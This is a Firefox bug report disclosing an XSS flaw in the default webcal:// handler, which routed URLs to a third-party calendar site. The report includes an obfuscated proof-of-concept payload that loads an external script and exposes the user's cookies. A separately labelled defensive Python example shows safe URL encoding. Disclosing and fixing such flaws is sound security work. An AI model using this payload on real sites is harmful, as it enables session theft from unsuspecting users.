Closed Bug 1532035 Opened 6 years ago Closed 6 years ago

webcal:// default URL handler is vulnerable to XSS which allows malicious URL crafting (+ invalid SSL certificate)

Categories

(Firefox :: File Handling, defect)

65 Branch
defect
Not set
normal


RESOLVED DUPLICATE of bug 1518627

People

(Reporter: mikagott, Unassigned)

Details

User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0

Steps to reproduce:

Actual results:

  • The default handler had bad SSL certificates
  • The default handler has an XSS vulnerability on the parameter that I use to handle URLs
  • A user can be prompted to open what seems to be a calendar-related dataset, but it can be exploited by any kind of XSS exploit without the user seeing it
  • A simple payload button example (includes bootstrap.min.js in the page and shows the user's cookies):

<button onclick='window.open("webcal:<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,47,47,109,97,120,99,100,110,46,98,111,111,116,115,116,114,97,112,99,100,110,46,99,111,109,47,98,111,111,116,115,116,114,97,112,47,52,46,51,46,49,47,106,115,47,98,111,111,116,115,116,114,97,112,46,109,105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59))</script>");'>click me</button>

Explanation:
The following URL (not really a URL ...):
"webcal:<script>...</script>"

will trigger a request to the following one:
"https://30boxes.com/external/widget?refer=ff&url=webcal%3A<script>...</script>"

as the handler for (webcal://) is configured as follows:
"https://30boxes.com/external/widget?refer=ff&url=%s"

This leads to the ability to pass anything to the "url" parameter, which is the one affected by the XSS. And the user would just have clicked the default "Open with 30boxes?" prompt.

Expected results:

  • The default handlers should be trustable ones with valid certificates and probably hosted by Mozilla itself.
  • (not required) The URL can/should be displayed to the client before opening it (popup)

Some additional information:

  • I'm using Firefox Quantum 65.0.1 (64-bit) (Fedora 29)
  • It seems that the file /.mozilla/firefox/default/mimeTypes.rdf is the one setting those handlers
  • I didn't try it from mobile devices, but I know that they use "webcal://" schemes to handle events and calendar-related stuff, which may be parsed in a better/worse way
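To make the substitution problem in the explanation above concrete, here is an added example (not code from the report or from Firefox): the handler template with "%s" is filled in two ways, raw (reproducing the behaviour described) and percent-encoded, and a defender-side check confirms the "url" parameter stays a single opaque value. The handler template is the one quoted in the report; the script input is a constructed marker string.

```python
from urllib.parse import quote, urlsplit, parse_qs

# Handler template for webcal:// as quoted in the report.
HANDLER_TEMPLATE = "https://30boxes.com/external/widget?refer=ff&url=%s"

# Constructed marker input standing in for the report's "webcal:<script>...</script>".
MARKER_INPUT = "webcal:<script>alert(1)</script>"


def build_handler_url_unsafe(template: str, scheme_url: str) -> str:
    """Raw %s substitution: the behaviour the report describes.
    Whatever follows 'webcal:' lands verbatim in the query string."""
    return template.replace("%s", scheme_url)


def build_handler_url(template: str, scheme_url: str) -> str:
    """Percent-encode the whole protocol URL before substituting it.
    safe="" encodes ':' and '/' too, so the value can never break out of
    the 'url' query parameter or carry HTML metacharacters."""
    return template.replace("%s", quote(scheme_url, safe=""))


def url_param_is_opaque(handler_url: str) -> bool:
    """Defender check on the final handler URL: exactly one 'url' value,
    it still starts with 'webcal:' after decoding, and the raw URL carries
    no HTML metacharacters that a sloppy site could echo into markup."""
    params = parse_qs(urlsplit(handler_url).query, keep_blank_values=True)
    values = params.get("url", [])
    if len(values) != 1 or not values[0].startswith("webcal:"):
        return False
    return not any(ch in handler_url for ch in "<>\"'")


if __name__ == "__main__":
    for builder in (build_handler_url_unsafe, build_handler_url):
        url = builder(HANDLER_TEMPLATE, MARKER_INPUT)
        print(builder.__name__, url_param_is_opaque(url), url)
```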

Someone else has already reported the XSS issue (bug 1518627), and we have removed the handler in Firefox 67 (current nightly) as a response to that issue, in bug 1252831.

(In reply to mikagott from comment #0)

  • I saw that it had bad certificates

[snip]

  • The default handler had bad SSL certificates

Can you elaborate on what you mean here? I'm seeing some passive mixed content, which is a problem in the site's implementation but not with the certificate, so I'm assuming you mean something else.

Flags: needinfo?(mikagott)

Hum, okay, I was sure I had the latest version. As for the certificates, I had warnings, but I think it was just a bad proxy node; I ran an sslscan and it seems okay, so you can close the bug, I guess!

Thanks for the quick answer!

Cheers,
Michael

Flags: needinfo?(mikagott)

(In reply to mikagott from comment #2)

Hum, okay, I was sure I had the latest version.

65 is latest release. 67 is latest development version, see https://nightly.mozilla.org/ .

As for the certificates, I had warnings, but I think it was just a bad proxy node; I ran an sslscan and it seems okay, so you can close the bug, I guess!

Thanks for the quick answer!

Thanks again for reporting the issue!

Status: UNCONFIRMED → RESOLVED
Closed: 6 years ago
Resolution: --- → DUPLICATE
Component: Untriaged → File Handling
Group: firefox-core-security